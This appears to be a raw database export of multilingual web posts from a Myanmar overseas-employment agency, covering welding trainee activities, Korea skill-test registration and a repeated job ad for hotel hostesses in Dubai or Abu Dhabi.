('activities', 0, 17, 148, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 148, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(3.6.2023)</p><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(3.6.2023)</p><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p><p>ニュー コメット トレーディング エージェンシー 株式会社</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 18, 59, 'en', 0, '<p>Food&amp;Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်</p><p>1-F&amp;B လုပ်သက်(၂)နှစ် အနည်းဆုံးရှိပြီး၊အတွေ့အကြုံရှိသည့်အမျိုးသမီးဖြစ်ရမည်</p><p>2-နေထိုင်စရိတ်၊စားစရိတ်၊လုပ်ငန်းခွင်အကြိုအပို့စရိတ်ငြိမ်းပါဝင်သည်</p><p>3-အသက်(၃၀)အောက်ဖြစ်ပြီး ကျန်းမာရေးကောင်းမွန်ပြီး ဆက်ဆံရေးပြေပြစ်ရမည်</p><p>4-တက္ကသိုလ်တစ်ခုခုမှ ဘွဲ့ရဖြစ်ရမည်</p><p>5-အင်္ဂလိပ်စာကိုကောင်းစွာပြောဆိုတတ်ရမည်</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 60, 'en', 0, '<p>Food&amp;Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်</p><p>1-F&amp;B လုပ်သက်(၂)နှစ် အနည်းဆုံးရှိပြီး၊အတွေ့အကြုံရှိသည့်အမျိုးသမီးဖြစ်ရမည်</p><p>2-နေထိုင်စရိတ်၊စားစရိတ်၊လုပ်ငန်းခွင်အကြိုအပို့စရိတ်ငြိမ်းပါဝင်သည်</p><p>3-အသက်(၃၀)အောက်ဖြစ်ပြီး ကျန်းမာရေးကောင်းမွန်ပြီး ဆက်ဆံရေးပြေပြစ်ရမည်</p><p>4-တက္ကသိုလ်တစ်ခုခုမှ ဘွဲ့ရဖြစ်ရမည်</p><p>5-အင်္ဂလိပ်စာကိုကောင်းစွာပြောဆိုတတ်ရမည်</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 61, 'en', 0, '<p>Food&amp;Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်</p><p>1-F&amp;B လုပ်သက်(၂)နှစ် အနည်းဆုံးရှိပြီး၊အတွေ့အကြုံရှိသည့်အမျိုးသမီးဖြစ်ရမည်</p><p>2-နေထိုင်စရိတ်၊စားစရိတ်၊လုပ်ငန်းခွင်အကြိုအပို့စရိတ်ငြိမ်းပါဝင်သည်</p><p>3-အသက်(၃၀)အောက်ဖြစ်ပြီး ကျန်းမာရေးကောင်းမွန်ပြီး ဆက်ဆံရေးပြေပြစ်ရမည်</p><p>4-တက္ကသိုလ်တစ်ခုခုမှ ဘွဲ့ရဖြစ်ရမည်</p><p>5-အင်္ဂလိပ်စာကိုကောင်းစွာပြောဆိုတတ်ရမည်</p><p>&nbsp;</p><h4>ဆက်သွယ်ရန်</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 71, 'en', 0, '<p>Food&amp;Beverage Hostess, (Dubai or Abu dhabi ရှိ ကြယ်ငါးပွင့်ဟိုတယ်တွင် တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်</p><p>1-F&amp;B လုပ်သက်(၂)နှစ် အနည်းဆုံးရှိပြီး၊အတွေ့အကြုံရှိသည့်အမျိုးသမီးဖြစ်ရမည်</p><p>2-နေထိုင်စရိတ်၊စားစရိတ်၊လုပ်ငန်းခွင်အကြိုအပို့စရိတ်ငြိမ်းပါဝင်သည်</p><p>3-အသက်(၃၀)အောက်ဖြစ်ပြီး ကျန်းမာရေးကောင်းမွန်ပြီး ဆက်ဆံရေးပြေပြစ်ရမည်</p><p>4-တက္ကသိုလ်တစ်ခုခုမှ ဘွဲ့ရဖြစ်ရမည်</p><p>5-အင်္ဂလိပ်စာကိုကောင်းစွာပြောဆိုတတ်ရမည်</p><p>&nbsp;</p><h4>ဆက်သွယ်ရန်</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 73, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-F&amp;B လုပ်သက်(၂)နှစ် အနည်းဆုံးရှိပြီး၊အတွေ့အကြုံရှိသည့်အမျိုးသမီးဖြစ်ရမည်</p><p>2-နေထိုင်စရိတ်၊စားစရိတ်၊လုပ်ငန်းခွင်အကြိုအပို့စရိတ်ငြိမ်းပါဝင်သည်</p><p>3-အသက်(၃၀)အောက်ဖြစ်ပြီး ကျန်းမာရေးကောင်းမွန်ပြီး ဆက်ဆံရေးပြေပြစ်ရမည်</p><p>4-တက္ကသိုလ်တစ်ခုခုမှ ဘွဲ့ရဖြစ်ရမည်</p><p>5-အင်္ဂလိပ်စာကိုကောင်းစွာပြောဆိုတတ်ရမည်</p><p>&nbsp;</p><h4>ဆက်သွယ်ရန်</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 74, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 128, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 128, 'ja', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 130, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 130, 'ja', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 130, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 207, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 207, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 207, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 317, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 317, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 317, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 320, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 320, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 320, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 336, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 336, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 336, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 337, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 337, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 337, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 338, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 338, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 338, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 65, 'en', 0, '<p><img data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\">ကိုရီယားနိူင်ငံသို့ဂဟေဆော်ကျွမ်းကျင်( E 7-3 ) Visa ဖြင့် သွားရောက်မည့်သူများမှ KOSHIPA SKILL TESTဖြေဆိုရန် စာရင်းလာရောက်ပေးသွင်းကြသူများ ပထမအသုတ်(၆၀)ယောက်ကျော်</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 85, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
